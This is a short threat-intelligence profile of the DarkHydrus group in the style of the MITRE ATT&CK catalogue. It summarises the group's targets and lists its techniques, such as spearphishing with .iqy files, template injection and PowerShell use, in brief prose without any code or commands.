DarkHydrus
DarkHydrus is a threat group that has targeted government agencies and educational institutions in the Middle East since at least 2016. The group heavily leverages open-source tools and custom payloads for carrying out attacks. [1] [2]
ID: G0079
Aliases: DarkHydrus
Version: 1.0
Alias Descriptions
Name | Description |
---|---|
DarkHydrus | [1] |
Techniques Used
Domain | ID | Name | Use |
---|---|---|---|
Enterprise | T1187 | Forced Authentication | DarkHydrus used Template Injection to launch an authentication window for users to enter their credentials.[3] |
Enterprise | T1086 | PowerShell | DarkHydrus leveraged PowerShell to download and execute additional scripts for execution.[1][2] |
Enterprise | T1193 | Spearphishing Attachment | DarkHydrus has sent spearphishing emails with password-protected RAR archives containing malicious Excel Web Query files (.iqy). The group has also sent spearphishing emails that contained malicious Microsoft Office documents that use the “attachedTemplate” technique to load a template from a remote server.[1][3][2] |
Enterprise | T1221 | Template Injection | DarkHydrus used an open-source tool, Phishery, to inject malicious remote template URLs into Microsoft Word documents and then sent them to victims to enable Forced Authentication.[3] |
Enterprise | T1204 | User Execution | DarkHydrus has sent malware that required users to hit the enable button in Microsoft Excel to allow an .iqy file to be downloaded.[1][2] |